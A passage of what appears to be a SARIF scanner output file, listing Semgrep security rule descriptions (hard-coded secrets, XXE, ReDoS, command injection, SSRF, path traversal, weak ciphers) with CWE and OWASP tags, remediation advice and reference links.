used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url","id":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","name":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"JWT token detected"},"help":{"markdown":"JWT token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"JWT token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token","id":"generic.secrets.security.detected-jwt-token.detected-jwt-token","name":"generic.secrets.security.detected-jwt-token.detected-jwt-token","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-jwt-token.detected-jwt-token"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"help":{"markdown":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","id":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","name":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"help":{"markdown":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"helpUri":"https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","id":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","name":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"help":{"markdown":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection)\n - [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)\n","text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection","id":"csharp.dotnet.security.razor-template-injection.razor-template-injection","name":"csharp.dotnet.security.razor-template-injection.razor-template-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.razor-template-injection.razor-template-injection"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"help":{"markdown":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape)\n - [https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates](https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates)\n - [https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code](https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code)\n","text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","id":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","name":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"help":{"markdown":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting)\n - [https://www.owasp.org/index.php/HTTP_Response_Splitting](https://www.owasp.org/index.php/HTTP_Response_Splitting)\n","text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting","id":"java.lang.security.audit.http-response-splitting.http-response-splitting","name":"java.lang.security.audit.http-response-splitting.http-response-splitting","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.http-response-splitting.http-response-splitting"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"help":{"markdown":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"helpUri":"https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos","id":"javascript.express.regexp-redos.regexp-redos","name":"javascript.express.regexp-redos.regexp-redos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.regexp-redos.regexp-redos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"the `encoding` argument to Popen is only available on Python 3.6+"},"help":{"markdown":"the `encoding` argument to Popen is only available on Python 3.6+\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2)\n","text":"the `encoding` argument to Popen is only available on Python 3.6+"},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2","id":"python.lang.compatibility.python36.python36-compatibility-Popen2","name":"python.lang.compatibility.python36.python36-compatibility-Popen2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python36.python36-compatibility-Popen2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Snyk API Key detected"},"help":{"markdown":"Snyk API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Snyk API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","id":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","name":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","id":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","name":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Database instance has no logging. Missing logs can cause missing important event information."},"help":{"markdown":"Database instance has no logging. Missing logs can cause missing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Database instance has no logging. Missing logs can cause missing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","id":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","name":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"help":{"markdown":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4)\n - [https://cwe.mitre.org/data/definitions/326.html](https://cwe.mitre.org/data/definitions/326.html)\n - [https://www.pycryptodome.org/src/cipher/cipher](https://www.pycryptodome.org/src/cipher/cipher)\n","text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","id":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","name":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","id":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","name":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","id":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","name":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve","id":"python.lang.file.tainted-shelve.tainted-shelve","name":"python.lang.file.tainted-shelve.tainted-shelve","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.tainted-shelve.tainted-shelve"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt."},"help":{"markdown":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","id":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","name":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"help":{"markdown":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen","id":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","name":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","properties":{"precision":"very-high","tags":["CWE-131: Incorrect Calculation of Buffer Size","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.alloc-strlen.alloc-strlen"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","id":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","name":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code 